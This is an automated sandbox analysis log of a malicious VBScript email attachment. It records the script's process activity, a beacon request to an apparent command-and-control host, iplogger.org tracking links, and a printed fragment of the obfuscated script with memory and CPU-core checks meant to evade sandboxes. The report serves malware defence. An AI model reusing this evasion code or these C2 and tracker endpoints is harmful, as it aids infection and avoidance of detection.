Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local | Jump to behavior |
Source: Joe Sandbox View | IP Address: 88.99.66.31 88.99.66.31 |
Source: Joe Sandbox View | IP Address: 88.99.66.31 88.99.66.31 |
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877 |
Source: global traffic | HTTP traffic detected: GET /api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive |
Source: msapplication.xml0.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml0.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml5.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml5.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml7.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: msapplication.xml7.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: unknown | DNS traffic detected: queries for: iplogger.org |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Dec 2020 19:42:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30 |
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp | String found in binary or memory: http://crl.com |
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp | String found in binary or memory: http://crl.com9 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# |
Source: {CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat.17.dr, ~DFCE3CEB3DA92FCDD0.TMP.17.dr | String found in binary or memory: http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBka |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy |
Source: msapplication.xml.17.dr | String found in binary or memory: http://www.amazon.com/ |
Source: msapplication.xml1.17.dr | String found in binary or memory: http://www.google.com/ |
Source: msapplication.xml2.17.dr | String found in binary or memory: http://www.live.com/ |
Source: msapplication.xml3.17.dr | String found in binary or memory: http://www.nytimes.com/ |
Source: msapplication.xml4.17.dr | String found in binary or memory: http://www.reddit.com/ |
Source: msapplication.xml5.17.dr | String found in binary or memory: http://www.twitter.com/ |
Source: msapplication.xml6.17.dr | String found in binary or memory: http://www.wikipedia.com/ |
Source: msapplication.xml7.17.dr | String found in binary or memory: http://www.youtube.com/ |
Source: wscript.exe, 00000000.00000003.711863605.000001C8B6372000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/ |
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712532222.000001C8B5BEB000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712769407.000001C8B4CF0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/18j267 |
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/18j267Nums |
Source: wscript.exe, 00000000.00000003.712665350.000001C8B3A16000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1D5y47 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: view_attach_72559.vbs | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal84.troj.evad.winVBS@4/52@2/2 |
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.dat | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs' |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs' | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2 | |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: view_attach_72559.vbs | Static file information: File size 1478801 > 1048576 |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll | Jump to behavior |
Source: | Binary string: c:\valueState\Redparagraph\unitList\Hislay\weight.pdb source: Oxnard.rb.0.dr |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep 2000If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) ThenExit FunctionEnd If' Kankakee blasphemy sunrise bramble screwworm ho religiosity. 8769309 hoot ambitious foppish grandmother tutu widen754 passerby scratchy892 bossy109. Verde274 Byrne. 4049332 Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_ComputerSystem")For Each rTSNo In kdDsaHAdlItemsKlcIhm = KlcIhm + Int((rTSNo.TotalPhysicalMemory) / (((81 - 2.0) + (1055520 - 278.0)) - 6745.0))NextIf KlcIhm < ((8197 - (7235 - 89.0)) - (22 - 1.0)) ThenHThYFgq' novo Auckland shrewd freedman persecutory thieves745 videotape Vega regent snowy cop cremate committee126 reticulum995 spigot charisma50 End IfREM regress bangle, 8711784 insubstantial359 michigan effectuate Reagan sin770 earmark discriminant notate. purify, conversion571 standeth vane ' sidereal600 evocate dance denude burst automorphism uranium Aldrich diffract stamp Bergland signal groan railway Erik villa Leon commendatory peptide alga End FunctionFunction spurn163()REM afternoon Barnhard230. alga500 whale Britain torso rapture slid indecomposable trudge Filipino. bazaar, big Hahn, cookery guilty debase, 419631 culprit Leland critic lusty cantor pater tate IEEE ceramic, 7701 crunchy verdict. effete, boulder voyage717 on error resume nextIf (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then' peak Bethlehem Terre Posner stifle Agee quartermaster204 NH dauphin nomad their neither scarves Exit FunctionREM autocollimate Giuliano attainder isle epidemic longue spoonful ambulant j Cinderella influenza hydrous Finn. Methuselah attune rectitude cervix End IfSet AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_Processor", , (((4 + 300.0) - 267.0) + (28 - 17.0)))' Kelvin scoff castor niece bump fiefdom491 lap sing thieving yearbook hydroxide. milestone rule. regrettable, vivify. 2683417 Lausanne ounce complain For Each rTSNo In kdDsaHAdlItems' roundworm glad capitol beachhead. nay Malthus replica. acquaint ampere iodine vermilion saw If rTSNo.NumberOfCores < ((25 - (22 - (15 - 13.0))) - 2.0) Thenchaotic = True' bipolar dodecahedral518 indium polysemous documentation262 capacitance tine thicken stature crest187 petition adject spectrography polymeric howdy. sheave taft112 indubitable, conjuncture near End IfNextIf chaotic Then' industrial Al |